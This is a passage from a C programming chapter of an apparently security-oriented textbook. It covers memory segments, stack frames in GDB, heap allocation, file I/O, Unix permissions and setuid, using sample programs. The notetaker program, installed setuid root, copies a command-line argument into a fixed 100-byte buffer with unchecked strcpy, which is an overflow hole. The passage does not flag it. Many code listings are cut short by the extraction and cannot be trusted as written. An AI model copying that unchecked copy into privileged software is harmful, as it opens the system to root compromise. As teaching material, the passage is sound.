var++;
// Add one to var
...

}
int main() { // The main function, with its own context
int i;
static int static_var = 1337; // Another static, in a different context
for(i=0; i < 5; i++) { // Loop 5 times
...

}
}

The aptly named static_var is defined as a static variable in two places:
within the context of main() and within the context of function()
...
The function simply prints the values of the two variables in its context and then adds 1 to both of them
...

reader@hacking:~/booksrc $ gcc static
...
/a
...
This is because static variables retain their values, but also because
they are only initialized once
...

Once again, printing the addresses of these variables by dereferencing
them with the unary address operator will provide greater viability into what’s
really going on
...
c for an example
...
c
#include ...

static_var++; // Add 1 to static_var
...

}
}

The results of compiling and executing static2
...

reader@hacking:~/booksrc $ gcc static2
...
/a
...

You may have noticed that the addresses of the local variables all have very
high addresses, like 0xbffff814, while the global and static variables all have
very low memory addresses, like 0x0804968c and 0x8049688
...
Read on for your answers
...
Each segment represents a special portion of memory that is
set aside for a certain purpose
...
This is where
the assembled machine language instructions of the program are located
...
As a program
executes, the EIP is set to the first instruction in the text segment
...

Reads the instruction that EIP is pointing to

2
...

Executes the instruction that was read in step 1

4
...
The processor doesn’t
care about the change, because it’s expecting the execution to be nonlinear
anyway
...

Write permission is disabled in the text segment, as it is not used to store
variables, only code
...
Another advantage of this segment being read-only is that it
can be shared among different copies of the program, allowing multiple
executions of the program at the same time without any problems
...

The data and bss segments are used to store global and static program
variables
...
Although
these segments are writable, they also have a fixed size
...
Both global and static variables are able to persist
because they are stored in their own memory segments
...
Blocks of memory in this segment can be allocated and used for
whatever the programmer might need
...

All of the memory within the heap is managed by allocator and deallocator
algorithms, which respectively reserve a region of memory in the heap for
use and remove reservations to allow that portion of memory to be reused
for later reservations
...
This means a programmer using the heap
allocation functions can reserve and free memory on the fly
...

The stack segment also has variable size and is used as a temporary scratch
pad to store local function variables and context during function calls
...
When a program calls a function,
that function will have its own set of passed variables, and the function’s code
will be at a different memory location in the text (or code) segment
...
All of this information is stored together on the stack in what is
collectively called a stack frame
...

In general computer science terms, a stack is an abstract data structure
that is used frequently
...
Think of it
as putting beads on a piece of string that has a knot on one end—you can’t
get the first bead off until you have removed all the other beads
...

As the name implies, the stack segment of memory is, in fact, a stack data
structure, which contains stack frames
...
Since this is very dynamic behavior, it
makes sense that the stack is also not of a fixed size
...

The FILO nature of a stack might seem odd, but since the stack is used
to store context, it’s very useful
...
The EBP register—sometimes
called the frame pointer (FP) or local base (LB) pointer—is used to reference local
function variables in the current stack frame
...
The SFP is used to restore EBP to its previous value, and the
return address is used to restore EIP to the next instruction found after the
function call
...

70

0x200

The following stack_example
...

stack_example
...
The local variables for the function
include a single character called flag and a 10-character buffer called buffer
...
After
compiling the program, its inner workings can be examined with GDB
...
The main() function starts at 0x08048357 and test_function()
starts at 0x08048344
...
These instructions are collectively called
the procedure prologue or function prologue
...
Sometimes
the function prologue will handle some stack alignment as well
...

reader@hacking:~/booksrc $ gcc -g stack_example
...
/a
...
so
...

(gdb) disass main
Dump of assembler code for function main():
0x08048357 :
push
ebp
0x08048358 :
mov
ebp,esp
0x0804835a :
sub
esp,0x18
0x0804835d :
and
esp,0xfffffff0
0x08048360 :
mov
eax,0x0
0x08048365 :
sub
esp,eax
0x08048367 :
mov
DWORD PTR [esp+12],0x4
0x0804836f :
mov
DWORD PTR [esp+8],0x3
0x08048377 :
mov
DWORD PTR [esp+4],0x2
0x0804837f :
mov
DWORD PTR [esp],0x1
0x08048386 :
call
0x8048344
0x0804838b :
leave
0x0804838c :
ret

P rog ra m min g

71

End of assembler dump
(gdb) disass test_function()
Dump of assembler code for function test_function:
0x08048344 :
push
ebp
0x08048345 :
mov
ebp,esp
0x08048347 :
sub
esp,0x28
0x0804834a :
mov
DWORD PTR [ebp-12],0x7a69
0x08048351 : mov
BYTE PTR [ebp-40],0x41
0x08048355 : leave
0x08048356 : ret
End of assembler dump
(gdb)

When the program is run, the main() function is called, which simply calls
test_function()
...

When test_function() is called, the function arguments are pushed onto the
stack in reverse order (since it’s FILO)
...
These values correspond to the variables d, c, b, and a in the
function
...

(gdb) disass main
Dump of assembler code for function main:
0x08048357 :
push
ebp
0x08048358 :
mov
ebp,esp
0x0804835a :
sub
esp,0x18
0x0804835d :
and
esp,0xfffffff0
0x08048360 :
mov
eax,0x0
0x08048365 :
sub
esp,eax
0x08048367 :
mov
DWORD PTR [esp+12],0x4
0x0804836f :
mov
DWORD PTR [esp+8],0x3
0x08048377 :
mov
DWORD PTR [esp+4],0x2
0x0804837f :
mov
DWORD PTR [esp],0x1
0x08048386 :
call
0x8048344
0x0804838b :
leave
0x0804838c :
ret
End of assembler dump
(gdb)

Next, when the assembly call instruction is executed, the return
address is pushed onto the stack and the execution flow jumps to the start of
test_function() at 0x08048344
...
In this case, the
return address would point to the leave instruction in main() at 0x0804838b
...
In this step, the current
value of EBP is pushed to the stack
...

The current value of ESP is then copied into EBP to set the new frame pointer
...
Memory is saved for these variables by subtracting from
ESP
...
In the
following output, a breakpoint is set in main() before the call to test_function()
and also at the beginning of test_function()
...
When the program is
run, execution stops at the breakpoint, where the register’s ESP (stack pointer),
EBP (frame pointer), and EIP (execution pointer) are examined
...
c, line 10
...
c, line 5
...
out
Breakpoint 1, main () at stack_example
...
This means the bottom of this new stack frame is at the current
value of ESP, 0xbffff7f0
...
The
output below shows similar information at the second breakpoint
...

(gdb) cont
Continuing
...
c:5
5
flag = 31337;
(gdb) i r esp ebp eip
esp
0xbffff7c0
0xbffff7c0
ebp
0xbffff7e8
0xbffff7e8
eip
0x804834a
0x804834a
(gdb) disass test_function
Dump of assembler code for function test_function:
0x08048344 :
push
ebp
0x08048345 :
mov
ebp,esp
0x08048347 :
sub
esp,0x28
0x0804834a :
mov
DWORD PTR [ebp-12],0x7a69
0x08048351 : mov
BYTE PTR [ebp-40],0x41
0x08048355 : leave
0x08048356 : ret
End of assembler dump
...
The four arguments to
the function can be seen at the bottom of the stack frame ( ), with the return
address found directly on top ( )
...
The rest of
the memory is saved for the local stack variables: flag and buffer
...
Memory for the flag variable is shown at and memory for the
buffer variable is shown at
...

74

0x200

After the execution finishes, the entire stack frame is popped off of the
stack, and the EIP is set to the return address so the program can continue
execution
...
As each function ends, its
stack frame is popped off of the stack so execution can be returned to the
previous function
...

The various segments of memory are arranged in the order they
were presented, from the lower memory addresses to the higher memory
addresses
...

Some texts have this reversed, which can be very confusing; so for this
book, smaller memory addresses
Low addresses
Text (code) segment
are always shown at the top
...

Since the heap and the stack
The heap grows
down toward
are both dynamic, they both grow
higher memory
addresses
...
This minimizes wasted space,
The stack grows
up toward lower
allowing the stack to be larger if the
memory addresses
...

Stack segment

High addresses

0x271

Memory Segments in C

In C, as in other compiled languages, the compiled code goes into the text
segment, while the variables reside in the remaining segments
...
Variables that are defined outside of any functions are considered
to be global
...
If static or global variables are initialized with data, they are stored in the data memory segment; otherwise, these
variables are put in the bss memory segment
...
Usually, pointers are used to reference memory on the heap
...
Since the stack can contain many different stack frames, stack
variables can maintain uniqueness within different functional contexts
...
c program will help explain these concepts in C
...
c
#include ...

int stack_var; // Notice this variable has the same name as the one in main()
...

printf("global_initialized_var is at address 0x%08x\n", &global_initialized_var);
printf("static_initialized_var is at address 0x%08x\n\n", &static_initialized_var);
// These variables are in the bss segment
...

printf("heap_var is at address 0x%08x\n\n", heap_var_ptr);
// These variables are in the stack segment
...
The global and static variables are declared as described
earlier, and initialized counterparts are also declared
...
The heap variable is actually declared as an integer pointer, which
will point to memory allocated on the heap memory segment
...
Since the newly allocated
memory could be of any data type, the malloc() function returns a void
pointer, which needs to be typecast into an integer pointer
...
c
reader@hacking:~/booksrc $
...
out
global_initialized_var is at address 0x080497ec
static_initialized_var is at address 0x080497f0
static_var is at address 0x080497f8
global_var is at address 0x080497fc
heap_var is at address 0x0804a008

76

0x200

stack_var is at address 0xbffff834
the function's stack_var is at address 0xbffff814
reader@hacking:~/booksrc $

The first two initialized variables have the lowest memory addresses,
since they are located in the data memory segment
...
These memory addresses are slightly larger than the previous
variables’ addresses, since the bss segment is located below the data segment
...

The heap variable is stored in space allocated on the heap segment,
which is located just below the bss segment
...
Finally,
the last two stack_vars have very large memory addresses, since they are located
in the stack segment
...

This allows both memory segments to be dynamic without wasting space in
memory
...
The second stack_var in function() has its
own unique context, so that variable is stored within a different stack frame
in the stack segment
...
Since the stack grows back up toward the heap segment
with each new stack frame, the memory address for the second stack_var
(0xbffff814 ) is smaller than the address for the first stack_var (0xbffff834 )
found within main()’s context
...
However, using the heap requires a bit more effort
...
This function accepts a size as its only argument and reserves that
much space in the heap segment, returning the address to the start of this
memory as a void pointer
...

The corresponding deallocation function is free()
...
These relatively simple functions are demonstrated
in heap_example
...

heap_example
...
h>
#include ...
h>

P rog ra m min g

77

int main(int argc, char *argv[]) {
char *char_ptr; // A char pointer
int *int_ptr;
// An integer pointer
int mem_size;
if (argc < 2)
// If there aren't command-line arguments,
mem_size = 50; // use 50 as the default value
...
\n");
exit(-1);
}
strcpy(char_ptr, "This is memory is located on the heap
...
\n");
exit(-1);
}
*int_ptr = 31337; // Put the value of 31337 where int_ptr is pointing
...
\n");
free(char_ptr); // Freeing heap memory
printf("\t[+] allocating another 15 bytes for char_ptr\n");
char_ptr = (char *) malloc(15); // Allocating more heap memory
if(char_ptr == NULL) { // Error checking, in case malloc() fails
fprintf(stderr, "Error: could not allocate heap memory
...
\n");
free(int_ptr); // Freeing heap memory
printf("\t[-] freeing char_ptr's heap memory
...
Then it uses the malloc() and
free() functions to allocate and deallocate memory on the heap
...
Since malloc() doesn’t know what type of memory it’s
allocating, it returns a void pointer to the newly allocated heap memory,
which must be typecast into the appropriate type
...
If the allocation fails and the pointer is NULL, fprintf() is used to
print an error message to standard error and the program exits
...
This function will be
explained more later, but for now, it’s just used as a way to properly display
an error
...

reader@hacking:~/booksrc $ gcc -o heap_example heap_example
...
/heap_example
[+] allocating 50 bytes of memory on the heap for char_ptr
char_ptr (0x804a008) --> 'This is memory is located on the heap
...

[+] allocating another 15 bytes for char_ptr
char_ptr (0x804a050) --> 'new memory'
[-] freeing int_ptr's heap memory
...

reader@hacking:~/booksrc $

In the preceding output, notice that each block of memory has an incrementally higher memory address in the heap
...
The heap allocation functions control this
behavior, which can be explored by changing the size of the initial memory
allocation
...
/heap_example 100
[+] allocating 100 bytes of memory on the heap for char_ptr
char_ptr (0x804a008) --> 'This is memory is located on the heap
...

[+] allocating another 15 bytes for char_ptr
char_ptr (0x804a008) --> 'new memory'
[-] freeing int_ptr's heap memory
...

reader@hacking:~/booksrc $

If a larger block of memory is allocated and then deallocated, the final
15-byte allocation will occur in that freed memory space, instead
...
Often, simple
informative printf() statements and a little experimentation can reveal many
things about the underlying system
...
c, there were several error checks for the malloc() calls
...
But with multiple malloc() calls, this errorchecking code needs to appear in multiple places
...
Since all the errorchecking code is basically the same for every malloc() call, this is a perfect
place to use a function instead of repeating the same instructions in multiple
places
...
c for an example
...
c
#include ...
h>
#include ...

else
mem_size = atoi(argv[1]);
printf("\t[+] allocating %d bytes of memory on the heap for char_ptr\n", mem_size);
char_ptr = (char *) errorchecked_malloc(mem_size); // Allocating heap memory
strcpy(char_ptr, "This is memory is located on the heap
...

printf("int_ptr (%p) --> %d\n", int_ptr, *int_ptr);
printf("\t[-] freeing char_ptr's heap memory
...
\n");
free(int_ptr); // Freeing heap memory
printf("\t[-] freeing char_ptr's heap memory
...
\n");
exit(-1);
}
return ptr;
}

The errorchecked_heap
...
c code, except the heap memory allocation and
error checking has been gathered into a single function
...
This lets
the compiler know that there will be a function called errorchecked_malloc() that
expects a single, unsigned integer argument and returns a void pointer
...
The function itself is quite simple; it just accepts the size in bytes to
allocate and attempts to allocate that much memory using malloc()
...

This way, the custom errorchecked_malloc() function can be used in place of
a normal malloc(), eliminating the need for repetitious error checking afterward
...

0x280

Building on Basics
Once you understand the basic concepts of C programming, the rest is pretty
easy
...
In fact,
if the functions were removed from any of the preceding programs, all that
would remain are very basic statements
...
File descriptors use a set of low-level I/O functions, and filestreams are
a higher-level form of buffered I/O that is built on the lower-level functions
...
In this book, the focus will be on the low-level
I/O functions that use file descriptors
...
Because this
number is unique among the other books in a bookstore, the cashier can
scan the number at checkout and use it to reference information about this
book in the store’s database
...
Four common functions that use file descriptors
are open(), close(), read(), and write()
...
The open() function opens a file for reading and/or writing
and returns a file descriptor
...
The file descriptor is passed as an
argument to the other functions like a pointer to the opened file
...
The read() and
write() functions’ arguments are the file descriptor, a pointer to the data to
read or write, and the number of bytes to read or write from that location
...
These flags and
their usage will be explained in depth later, but for now let’s take a look at a
simple note-taking program that uses file descriptors—simplenote
...
This
program accepts a note as a command-line argument and then adds it to the
end of the file /tmp/notes
...
Other functions are used to display a usage message and to handle fatal errors
...

simplenote
...
h>
...
h>
...
h>

void usage(char *prog_name, char *filename) {
printf("Usage: %s \n", prog_name, filename);
exit(0);
}
void fatal(char *);
// A function for fatal errors
void *ec_malloc(unsigned int); // An error-checked malloc() wrapper
int main(int argc, char *argv[]) {
int fd; // file descriptor
char *buffer, *datafile;
buffer = (char *) ec_malloc(100);
datafile = (char *) ec_malloc(20);
strcpy(datafile, "/tmp/notes");
if(argc < 2)
// If there aren't command-line arguments,
usage(argv[0], datafile); // display usage message and exit
...

printf("[DEBUG] buffer
@ %p: \'%s\'\n", buffer, buffer);
printf("[DEBUG] datafile @ %p: \'%s\'\n", datafile, datafile);
strncat(buffer, "\n", 1); // Add a newline on the end
...
\n");
free(buffer);
free(datafile);
}
// A function to display an error message and then exit
void fatal(char *message) {
char error_message[100];
strcpy(error_message, "[!!] Fatal Error ");
strncat(error_message, message, 83);
perror(error_message);
exit(-1);
}
// An error-checked malloc() wrapper function
void *ec_malloc(unsigned int size) {
void *ptr;
ptr = malloc(size);
if(ptr == NULL)
fatal("in ec_malloc() on memory allocation");
return ptr;
}

Besides the strange-looking flags used in the open() function, most of this
code should be readable
...
The strlen() function accepts a string and returns its
length
...
The perror() function is short for print error and is
used in fatal() to print an additional error message (if it exists) before exiting
...
c
reader@hacking:~/booksrc $
...
/simplenote
P rog ra m min g

83

reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ cat /tmp/notes
this is a test note
reader@hacking:~/booksrc $
...

reader@hacking:~/booksrc $ cat /tmp/notes
this is a test note
great, it works
reader@hacking:~/booksrc $

The output of the program’s execution is pretty self-explanatory, but
there are some things about the source code that need further explanation
...
h and sys/stat
...
The first set of flags is found in fcntl
...
The access mode must use at least one of
the following three flags:
O_RDONLY
O_WRONLY
O_RDWR

Open file for read-only access
...

Open file for both read and write access
...
A few of the more common and useful of these flags are
as follows:
O_APPEND
O_TRUNC
O_CREAT

Write data at the end of the file
...

Create the file if it doesn’t exist
...
When two bits enter an OR gate, the result is 1 if either the first bit or the
second bit is 1
...
Full 32-bit values can use these bitwise operators to
perform logic operations on each corresponding bit
...
c and the program output demonstrate these bitwise operations
...
c
#include ...

bit_b = (i & 1);
// Get the first bit
...

bit_b = (i & 1);
// Get the first bit
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
bitwise OR operator |
0 | 0 = 0
0 | 1 = 1
1 | 0 = 1
1 | 1 = 1
bitwise AND operator &
0 & 0 = 0
0 & 1 = 0
1 & 0 = 0
1 & 1 = 1
reader@hacking:~/booksrc $

The flags used for the open() function have values that correspond to
single bits
...
The fcntl_flags
...
h and how they combine with each other
...
c
#include ...
h>
void display_flags(char *, unsigned int);
void binary_print(unsigned int);
int main(int argc, char *argv[]) {
display_flags("O_RDONLY\t\t", O_RDONLY);
display_flags("O_WRONLY\t\t", O_WRONLY);
display_flags("O_RDWR\t\t\t", O_RDWR);
printf("\n");
display_flags("O_APPEND\t\t", O_APPEND);
display_flags("O_TRUNC\t\t\t", O_TRUNC);
display_flags("O_CREAT\t\t\t", O_CREAT);

P rog ra m min g

85

printf("\n");
display_flags("O_WRONLY|O_APPEND|O_CREAT", O_WRONLY|O_APPEND|O_CREAT);
}
void display_flags(char *label, unsigned int value) {
printf("%s\t: %d\t:", label, value);
binary_print(value);
printf("\n");
}
void binary_print(unsigned int value) {
unsigned int mask = 0xff000000; // Start with a mask for the highest byte
...

unsigned int byte, byte_iterator, bit_iterator;
for(byte_iterator=0; byte_iterator < 4; byte_iterator++) {
byte = (value & mask) / shift; // Isolate each byte
...

if(byte & 0x80) // If the highest bit in the byte isn't 0,
printf("1");
// print a 1
...

byte *= 2;
// Move all the bits to the left by 1
...

shift /= 256;
// Move the bits in shift right by 8
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
O_RDONLY
: 0
: 00000000 00000000 00000000 00000000
O_WRONLY
: 1
: 00000000 00000000 00000000 00000001
O_RDWR
: 2
: 00000000 00000000 00000000 00000010
O_APPEND
O_TRUNC
O_CREAT

: 1024
: 512
: 64

: 00000000 00000000 00000100 00000000
: 00000000 00000000 00000010 00000000
: 00000000 00000000 00000000 01000000

O_WRONLY|O_APPEND|O_CREAT
$

: 1089

: 00000000 00000000 00000100 01000001

Using bit flags in combination with bitwise logic is an efficient and commonly used technique
...
In fcntl_flags
...
This technique only works
when all the bits are unique, though
...

This argument uses bit flags defined in sys/stat
...

S_IRUSR

Give the file read permission for the user (owner)
...

S_IXUSR

Give the file execute permission for the user (owner)
...

S_IWGRP

Give the file write permission for the group
...

S_IROTH

Give the file read permission for other (anyone)
...

S_IXOTH

Give the file execute permission for other (anyone)
...
If they don’t make sense, here’s a crash course in
Unix file permissions
...
These values can be displayed using
ls -l and are shown below in the following output
...
c

For the /etc/passwd file, the owner is root and the group is also root
...

Read, write, and execute permissions can be turned on and off for three
different fields: user, group, and other
...
These fields are also displayed in the front of the
ls -l output
...
The next three
characters display the group permissions, and the last three characters are
for the other permissions
...
Each permission corresponds to a bit flag; read is 4 (100 in binary), write is 2 (010 in binary), and
execute is 1 (001 in binary)
...
These values can be added together to define permissions for
user, group, and other using the chmod command
...
c
ls -l simplenote
...
c
chmod ugo-wx simplenote
...
c
1826 2007-09-07 02:51 simplenote
...
c
ls -l simplenote
...
c

The first command (chmod 721) gives read, write, and execute permissions to
the user, since the first number is 7 (4 + 2 + 1), write and execute permissions
to group, since the second number is 3 (2 + 1), and only execute permission to other, since the third number is 1
...
In the next chmod command, the argument ugo-wx
means Subtract write and execute permissions from user, group, and other
...

In the simplenote program, the open() function uses S_IRUSR|S_IWUSR for
its additional permission argument, which means the /tmp/notes file should
only have user read and write permission when it is created
...
This user ID can
be displayed using the id command
...
The su command can be used to switch to a different user, and if this command is run as root, it can be done without a password
...

On the LiveCD, sudo has been configured so it can be executed without a password, for simplicity’s sake
...

88

0x200

reader@hacking:~/booksrc $ sudo su jose
jose@hacking:/home/reader/booksrc $ id
uid=501(jose) gid=501(jose) groups=501(jose)
jose@hacking:/home/reader/booksrc $

As the user jose, the simplenote program will run as jose if it is executed,
but it won’t have access to the /tmp/notes file
...

jose@hacking:/home/reader/booksrc $ ls -l /tmp/notes
-rw------- 1 reader reader 36 2007-09-07 05:20 /tmp/notes
jose@hacking:/home/reader/booksrc $
...
For example, the /etc/passwd file contains account
information for every user on the system, including each user’s default login
shell
...

This program needs to be able to make changes to the /etc/passwd file, but
only on the line that pertains to the current user’s account
...
This is an additional file permission bit that can be set using chmod
...

reader@hacking:~/booksrc $ which chsh
/usr/bin/chsh
reader@hacking:~/booksrc $ ls -l /usr/bin/chsh /etc/passwd
-rw-r--r-- 1 root root 1424 2007-09-06 21:05 /etc/passwd
-rwsr-xr-x 1 root root 23920 2006-12-19 20:35 /usr/bin/chsh
reader@hacking:~/booksrc $

The chsh program has the setuid flag set, which is indicated by an s in the
ls output above
...

The /etc/passwd file that chsh writes to is also owned by root and only allows
the owner to write to it
...
This
means that a running program has both a real user ID and an effective user
ID
...
c
...
c
#include ...
c are as follows
...
c
reader@hacking:~/booksrc $ ls -l uid_demo
-rwxr-xr-x 1 reader reader 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $
...
/uid_demo
reader@hacking:~/booksrc $ ls -l uid_demo
-rwxr-xr-x 1 root root 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $
...
c, both user IDs are shown to be 999 when
uid_demo is executed, since 999 is the user ID for reader
...
The program can still be executed, since it has execute

permission for other, and it shows that both user IDs remain 999, since
that’s still the ID of the user
...
/uid_demo
chmod: changing permissions of `
...
/uid_demo
reader@hacking:~/booksrc $ ls -l uid_demo
-rwsr-xr-x 1 root root 6825 2007-09-07 05:32 uid_demo
reader@hacking:~/booksrc $
...
The chmod u+s command turns on the setuid permission, which can be seen in the following ls -l output
...
This is how the chsh program is able to allow
any user to change his or her login shell stored in /etc/passwd
...

The next program will be a modification of the simplenote program; it will
also record the user ID of each note’s original author
...

The ec_malloc() and fatal() functions have been useful in many of our
programs
...

hacking
...
h, the functions can just be included
...
If the filename
is surrounded by quotes, the compiler looks in the current directory
...
h is in the same directory as a program, it can be included
with that program by typing #include "hacking
...

The changed lines for the new notetaker program (notetaker
...

notetaker
...
h>
...
h>
...
h>
"hacking
...

strcpy(buffer, argv[1]);

// Copy into buffer
...

// Writing data
if(write(fd, &userid, 4) == -1) // Write user ID before note data
...

if(write(fd, buffer, strlen(buffer)) == -1) // Write note
...

// Closing file
if(close(fd) == -1)
fatal("in main() while closing file");
printf("Note has been saved
...
The getuid() function is used to
get the real user ID, which is written to the datafile on the line before the note’s
line is written
...

92

0x200

reader@hacking:~/booksrc $ gcc -o notetaker notetaker
...
/notetaker
reader@hacking:~/booksrc $ sudo chmod u+s
...
/notetaker
-rwsr-xr-x 1 root root 9015 2007-09-07 05:48
...
/notetaker "this is a test of multiuser notes"
[DEBUG] buffer
@ 0x804a008: 'this is a test of multiuser notes'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
Now when the program
is executed, the program runs as the root user, so the file /var/notes is also
owned by root when it is created
...
this is a t|
|est of multiuser|
| notes
...

Because of little-endian architecture, the 4 bytes of the integer 999 appear
reversed in hexadecimal (shown in bold above)
...
The notesearch
...
Additionally, an
optional command-line argument can be supplied for a search string
...

notesearch
...
h>
...
h>
...
h"

P rog ra m min g

93

#define FILENAME "/var/notes"
int print_notes(int, int, char *);
int find_user_note(int, int);
int search_note(char *, char *);
void fatal(char *);

//
//
//
//

Note printing function
...

Search for keyword function
...

userid = getuid();
fd = open(FILENAME, O_RDONLY); // Open the file for read-only access
...

int print_notes(int fd, int uid, char *searchstring) {
int note_length;
char byte=0, note_buffer[100];
note_length = find_user_note(fd, uid);
if(note_length == -1) // If end of file reached,
return 0;
//
return 0
...

note_buffer[note_length] = 0;
// Terminate the string
...

return 1;
}
// A function to find the next note for a given userID;
// returns -1 if the end of the file is reached;
// otherwise, it returns the length of the found note
...

if(read(fd, ¬e_uid, 4) != 4) // Read the uid data
...

if(read(fd, &byte, 1) != 1) // Read the newline separator
...

if(read(fd, &byte, 1) != 1) // Read a single byte
...

length++;
}
}
lseek(fd, length * -1, SEEK_CUR); // Rewind file reading by length bytes
...

int search_note(char *note, char *keyword) {
int i, keyword_length, match=0;
keyword_length = strlen(keyword);
if(keyword_length == 0) // If there is no search string,
return 1;
// always "match"
...

if(note[i] == keyword[match]) // If byte matches keyword,
match++;
// get ready to check the next byte;
else {
//
otherwise,
if(note[i] == keyword[0]) // if that byte matches first keyword byte,
match = 1; // start the match count at 1
...

}
if(match == keyword_length) // If there is a full match,
return 1;
// return matched
...

}

Most of this code should make sense, but there are some new concepts
...
Also, the
function lseek() is used to rewind the read position in the file
...

Since this turns out to be a negative number, the position is moved backward
by length bytes
...
c
sudo chown root:root
...
/notesearch

...
But this is just a single user; what happens if a different user uses
the notetaker and notesearch programs?
reader@hacking:~/booksrc $ sudo su jose
jose@hacking:/home/reader/booksrc $
...

jose@hacking:/home/reader/booksrc $
...
This
means that value is added to all notes written with notetaker, and only notes
with a matching user ID will be displayed by the notesearch program
...
/notetaker "This is another note for the reader user"
[DEBUG] buffer @ 0x804a008: 'This is another note for the reader user'
[DEBUG] datafile @ 0x804a070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
...
/notesearch
[DEBUG] found a 34 byte note for user id 999
this is a test of multiuser notes
[DEBUG] found a 41 byte note for user id 999
This is another note for the reader user
-------[ end of note data ]------reader@hacking:~/booksrc $

Similarly, all notes for the user reader have the user ID 999 attached to
them
...
This is very similar to how the /etc/passwd file stores
user information for all users, yet programs like chsh and passwd allow any user
to change his own shell or password
...
In C, structs are variables that can contain many other variables
...

96

0x200

A simple example will suffice for now
...
h
...

struct tm {
int
int
int
int
int
int
int
int
int
};

tm_sec;
tm_min;
tm_hour;
tm_mday;
tm_mon;
tm_year;
tm_wday;
tm_yday;
tm_isdst;

/*
/*
/*
/*
/*
/*
/*
/*
/*

seconds */
minutes */
hours */
day of the month */
month */
year */
day of the week */
day in the year */
daylight saving time */

After this struct is defined, struct tm becomes a usable variable type, which
can be used to declare variables and pointers with the data type of the tm struct
...
c program demonstrates this
...
h is included,
the tm struct is defined, which is later used to declare the current_time and
time_ptr variables
...
c
#include ...
h>
int main() {
long int seconds_since_epoch;
struct tm current_time, *time_ptr;
int hour, minute, second, day, month, year;
seconds_since_epoch = time(0); // Pass time a null pointer as argument
...

localtime_r(&seconds_since_epoch, time_ptr);
// Three different ways to access struct elements:
hour = current_time
...
Time on Unix systems is kept relative to this rather arbitrary point in
time, which is also known as the epoch
...
The pointer time_ptr has already been set to the address
P rog ra m min g

97

of current_time, an empty tm struct
...
The elements of structs can be accessed in
three different ways; the first two are the proper ways to access struct elements,
and the third is a hacked solution
...
Therefore, current_time
...
Pointers to structs are often used,
since it is much more efficient to pass a four-byte pointer than an entire data
structure
...
When using a struct pointer like time_ptr, struct elements can be
similarly accessed by the struct element’s name, but using a series of characters that looks like an arrow pointing right
...
The
seconds could be accessed via either of these proper methods, using the
tm_sec element or the tm struct, but a third method is used
...
c
reader@hacking:~/booksrc $
...
out
time() - seconds since epoch: 1189311588
Current time is: 04:19:48
reader@hacking:~/booksrc $
...
out
time() - seconds since epoch: 1189311600
Current time is: 04:20:00
reader@hacking:~/booksrc $

The program works as expected, but how are the seconds being accessed
in the tm struct? Remember that in the end, it’s all just memory
...
In the line second = *((int *) time_ptr), the variable time_ptr
is typecast from a tm struct pointer to an integer pointer
...
Since
the address to the tm struct also points to the first element of this struct, this
will retrieve the integer value for tm_sec in the struct
...
c code (time_example2
...
This shows that the elements of tm struct are right next to each
other in memory
...

time_example2
...
h>
#include ...

printf("\n");
}
printf("\n");
}
int main() {
long int seconds_since_epoch;
struct tm current_time, *time_ptr;
int hour, minute, second, i, *int_ptr;
seconds_since_epoch = time(0); // Pass time a null pointer as argument
...

localtime_r(&seconds_since_epoch, time_ptr);
// Three different ways to access struct elements:
hour = current_time
...

int_ptr = (int *) time_ptr;
for(i=0; i < 3; i++) {
printf("int_ptr @ 0x%08x : %d\n", int_ptr, *int_ptr);
int_ptr++; // Adding 1 to int_ptr adds 4 to the address,
}
// since an int is 4 bytes in size
...
c are as follows
...
c
reader@hacking:~/booksrc $
...
out
time() - seconds since epoch: 1189311744
Current time is: 04:22:24
bytes of struct located at 0xbffff7f0
18 00 00 00 16 00 00 00 04 00 00 00 09 00 00 00
08 00 00 00 6b 00 00 00 00 00 00 00 fb 00 00 00
00 00 00 00 00 00 00 00 28 a0 04 08
int_ptr @ 0xbffff7f0 : 24
int_ptr @ 0xbffff7f4 : 22
int_ptr @ 0xbffff7f8 : 4
reader@hacking:~/booksrc $
P rog ra m min g

99

While struct memory can be accessed this way, assumptions are made
about the type of variables in the struct and the lack of any padding between
variables
...

0x285

Function Pointers

A pointer simply contains a memory address and is given a data type that
describes where it points
...
The funcptr_example
...

funcptr_example
...
h>
int func_one() {
printf("This is function one\n");
return 1;
}
int func_two() {
printf("This is function two\n");
return 2;
}
int main() {
int value;
int (*function_ptr) ();
function_ptr = func_one;
printf("function_ptr is 0x%08x\n", function_ptr);
value = function_ptr();
printf("value returned was %d\n", value);
function_ptr = func_two;
printf("function_ptr is 0x%08x\n", function_ptr);
value = function_ptr();
printf("value returned was %d\n", value);
}

In this program, a function pointer aptly named function_ptr is declared
in main()
...
The output below shows
the compilation and execution of this source code
...
c
reader@hacking:~/booksrc $
...
out
function_ptr is 0x08048374
This is function one
value returned was 1

100

0x 200

function_ptr is 0x0804838d
This is function two
value returned was 2
reader@hacking:~/booksrc $

0x286

Pseudo-random Numbers

Since computers are deterministic machines, it is impossible for them to
produce truly random numbers
...
The pseudo-random number generator functions fill this need
by generating a stream of numbers that is pseudo-random
...
Deterministic machines cannot produce true randomness, but if
the seed value of the pseudo-random generation function isn’t known, the
sequence will seem random
...
These functions and
RAND_MAX are defined in stdlib
...
While the numbers rand() returns will appear
to be random, they are dependent on the seed value provided to srand()
...
One common
practice is to use the number of seconds since epoch (returned from the time()
function) as the seed
...
c program demonstrates this
technique
...
c
#include ...
h>
int main() {
int i;
printf("RAND_MAX is %u\n", RAND_MAX);
srand(time(0));
printf("random values from 0 to RAND_MAX\n");
for(i=0; i < 8; i++)
printf("%d\n", rand());
printf("random values from 1 to 20\n");
for(i=0; i < 8; i++)
printf("%d\n", (rand()%20)+1);
}

Notice how the modulus operator is used to obtain random values from
1 to 20
...
c
reader@hacking:~/booksrc $
...
out
RAND_MAX is 2147483647
random values from 0 to RAND_MAX
Pr og ra mm in g

101

815015288
1315541117
2080969327
450538726
710528035
907694519
1525415338
1843056422
random values from 1 to 20
2
3
8
5
9
1
4
20
reader@hacking:~/booksrc $
...
out
RAND_MAX is 2147483647
random values from 0 to RAND_MAX
678789658
577505284
1472754734
2134715072
1227404380
1746681907
341911720
93522744
random values from 1 to 20
6
16
12
19
8
19
2
1
reader@hacking:~/booksrc $

The program’s output just displays random numbers
...

0x287

A Game of Chance

The final program in this section is a set of games of chance that use many
of the concepts we’ve discussed
...
